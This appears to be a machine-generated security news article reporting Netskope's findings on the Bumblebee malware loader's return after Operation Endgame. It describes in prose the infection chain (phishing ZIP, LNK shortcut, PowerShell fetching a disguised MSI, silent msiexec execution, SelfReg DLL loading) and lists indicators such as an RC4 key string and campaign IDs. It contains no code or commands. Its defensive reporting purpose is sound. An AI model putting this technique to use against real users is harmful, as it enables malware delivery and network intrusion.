Ethical Hacking News
Bumblebee malware has resurfaced after a nearly four-month hiatus, raising concerns about its resurgence and potential threats to victim networks. In a recent report by Netskope, researchers documented a new Bumblebee attack chain that exploits phishing emails, malicious MSI files, and PowerShell scripts. The article delves into the tactics used by Bumblebee, including its signature internal DLL naming scheme and RC4 key string "NEW_BLACK," providing an in-depth look at this evolving malware threat.
Bumblebee malware has returned after a temporary silence following Operation Endgame's disruption in May. The latest resurgence is marked by similarities with past variants, including retention of the internal DLL naming scheme and configuration extraction mechanisms. New campaign IDs "msi" and "lnk001" are used in recent attacks. Netskope notes the RC4 key includes the string "NEW_BLACK" for decryption.
Europol's Operation Endgame, a coordinated international law enforcement effort, disrupted over a hundred servers supporting various malware loader operations in May. Among the targeted malware loaders were IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. The disruption was successful in seizing the servers and dismantling the operation, but it seemed to have temporarily silenced Bumblebee.
However, recent observations by researchers at cybersecurity company Netskope indicate that Bumblebee malware has returned, sparking concerns about its resurgence. As a replacement for the BazarLoader backdoor in 2022, Bumblebee provided ransomware threat actors with access to victim networks via phishing, malvertising, and SEO poisoning techniques.
In order to achieve infection, Bumblebee exploits various tactics such as sending phishing emails that lure victims into downloading malicious ZIP archives. The compressed files contain links named "Report-41952.lnk," which trigger PowerShell scripts to download a malicious .MSI file disguised as a legitimate NVIDIA driver update or Midjourney installer from a remote server.
The MSI file is then executed silently using the msiexec.exe command with the /qn option, ensuring that the process runs without any user interaction. The malware uses the SelfReg table within the MSI structure to load its DLL into the msiexec.exe process's address space and invoke its DllRegisterServer function, initiating an unpacking process.
Netskope notes that Bumblebee payload retains its signature internal DLL and exported functions naming scheme as well as configuration extraction mechanisms seen in past variants. In recent attacks, the RC4 key used for decryption of its configuration includes the string "NEW_BLACK." Additionally, two campaign IDs are utilized: "msi" and "lnk001."
While Netskope did not provide further information on the dropped payloads or the scale of this latest Bumblebee campaign, this report serves as a warning of early signs of Bumblebee's possible resurgence.
For those looking for more details about the current situation with Bumblebee malware, the complete list of indicators of compromise is available on a GitHub repository. This article provides in-depth coverage of the recent developments surrounding Bumblebee and its implications for cybersecurity experts and individuals alike.
Related Information:
https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-after-recent-law-enforcement-disruption/
https://www.infosecurity-magazine.com/news/possible-bumblebee-resurgence/
https://darktrace.com/blog/pikabot-malware-battling-a-fast-moving-loader-malware-in-the-wild
https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/
https://unit42.paloaltonetworks.com/bazarloader-malware/
Published: Mon Oct 21 15:57:55 2024 by llama3.2 3B Q4_K_M
